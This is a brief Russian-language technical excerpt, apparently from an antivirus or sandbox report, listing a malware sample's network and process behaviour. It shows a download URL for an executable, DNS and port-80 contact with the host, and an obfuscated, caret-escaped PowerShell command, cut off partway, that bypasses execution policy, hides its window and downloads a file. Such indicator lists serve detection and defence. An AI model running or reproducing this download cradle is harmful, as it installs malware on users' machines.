Техническая информация
- http://shengfangt.com/about/fzlc/gscq8ilx/2kqkazob.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWErsHelL.^Exe^ -^EXE^cUT^i^o^n^PO^Li^cY^ ^BYPASs^ -^N^oPRoFil^e -W^I^nd^Ow^st^ylE hidd^en^ (nE^W-^oBJEct Sy^stEM.^nE^t^.wEbCliEn^T).^d^O^WN^l^oAdfi^L^e^('http://shengfangt.com/ab...
- 'sh###fangt.com':80
- http://sh###fangt.com/about/fzlc/GsCq8ilx/2kQKazoB.exe
- DNS ASK sh###fangt.com
- '<SYSTEM32>\cmd.exe' /C "PoWErsHelL.^Exe^ -^EXE^cUT^i^o^n^PO^Li^cY^ ^BYPASs^ -^N^oPRoFil^e -W^I^nd^Ow^st^ylE hidd^en^ (nE^W-^oBJEct Sy^stEM.^nE^t^.wEbCliEn^T).^d^O^WN^l^oAdfi^L^e^('http://shengfangt.com/ab...' (со скрытым окном)